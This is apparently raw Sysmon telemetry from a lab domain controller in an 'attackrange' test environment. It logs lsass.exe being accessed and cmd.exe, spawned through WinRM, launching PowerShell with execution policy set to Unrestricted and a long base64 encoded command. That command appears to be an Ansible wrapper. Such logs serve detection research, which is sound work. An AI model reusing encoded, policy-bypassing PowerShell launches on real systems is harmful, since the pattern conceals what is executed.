BBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8516-5FCF-1C60-100000000000}0x10601c0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8516-5FCF-C202-000000009001}3184C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x800000000000000078Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.868{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000077Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.868{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000076Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.868{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000075Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.868{10ACEC4A-8516-5FCF-C102-000000009001}42764564C:\Windows\system32\conhost.exe{10ACEC4A-8516-5FCF-C202-000000009001}3184C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000074Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000073Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000072Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000071Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000070Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000069Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000068Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000067Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000066Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000065Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.868{10ACEC4A-83AA-5FCF-0500-000000009001}640656C:\Windows\system32\csrss.exe{10ACEC4A-8516-5FCF-C202-000000009001}3184C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000064Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.868{10ACEC4A-8516-5FCF-C002-000000009001}29804320C:\Windows\system32\WinrsHost.exe{10ACEC4A-8516-5FCF-C202-000000009001}3184C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x800000000000000063Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.865{10ACEC4A-8516-5FCF-C202-000000009001}3184C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgB